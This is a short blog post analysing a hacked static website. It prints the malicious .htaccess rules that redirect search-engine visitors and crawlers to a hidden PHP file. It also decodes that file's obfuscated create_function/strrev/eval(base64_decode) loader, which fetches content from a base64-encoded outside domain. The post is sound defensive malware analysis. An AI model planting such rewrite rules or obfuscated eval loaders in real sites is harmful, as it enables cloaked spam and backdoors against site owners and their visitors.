.htaccess compromised

Screen Shot 2016-08-09 at 7.08.01 AM

A simple, clean, flat html site was recently hacked for its Search Engine referrer. Arriving at the site by typing the domain, or some secondary link, would provide the site without issue. Arriving via an SE or with an SE user agent, well, that’s a paddlin’

paddlin.png

Here’s the .htaccess file

RewriteEngine On

RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ – [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ details-enforcers.php?$1 [L]

ooooh…details-enforcers.php. Sounds important! Let’s take a look:

Screen Shot 2016-08-09 at 7.15.35 AM

Hello Mr. Fancy Pants. Let’s see what you are trying to hide:

That first variable is

$meymun=”\x63″.chr(114).”\x65″.”a”.chr(116).chr(101).”_”.chr(102).”u”.”n”.”\x63″.chr(116).chr(105).chr(111).chr(110); 

is fancy-speak for create_function

$qweboi = $meymun(‘$a’,strrev(‘;)a$(lave’));

becomes an anonymous function lambda_1. Then the next line we see a strrev(), because nothing is as secure as reversing a string. So lets do it: Hey, it’s an eval(base64_decode())! **sarcasm**

It is a PHP script I have put HERE. What’s funny is that they base64_encoded() a domain name in the script:

 $domain=base64_decode(“bWFnMWN3MHJsZC5jb20=”); 

That sends content. The domain?

mag1cw0rld.com

You know they are good because they use 1’s for i’s and zero’s for o’s.

9555997_orig.png

 

 

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s